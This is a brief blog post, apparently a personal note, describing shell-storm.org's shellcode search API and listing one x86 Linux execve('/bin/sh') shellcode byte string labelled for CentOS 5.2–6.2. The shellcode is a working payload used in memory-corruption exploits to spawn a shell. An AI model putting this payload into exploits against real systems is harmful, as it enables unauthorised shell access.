2013. 12. 12. 23:29

Description

This page lists a few shellcodes and proposes an API to search a specific shellcode. If you want to add your shellcode in this database, send an email at submit at shell-storm org

 

API

This is very straightforward to communicate with the API. Just send a simple GET method. The "s" argument contains your keyword.

http://shell-storm.org/api/?s=<keyword>

The output will be like that :

<auteur 1>::::<plateforme 1>::::<shellcode title 1>::::<shellcode id 1>::::<shellcode url 1>
<auteur 2>::::<plateforme 2>::::<shellcode title 2>::::<shellcode id 2>::::<shellcode url 2>
<auteur 3>::::<plateforme 3>::::<shellcode title 3>::::<shellcode id 3>::::<shellcode url 3>

For more information, you can find/use this shell-storm API script.


 

 


CENTOS  5.2 ~ 6.2 까지 쉘코드 

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"




Posted by k1rha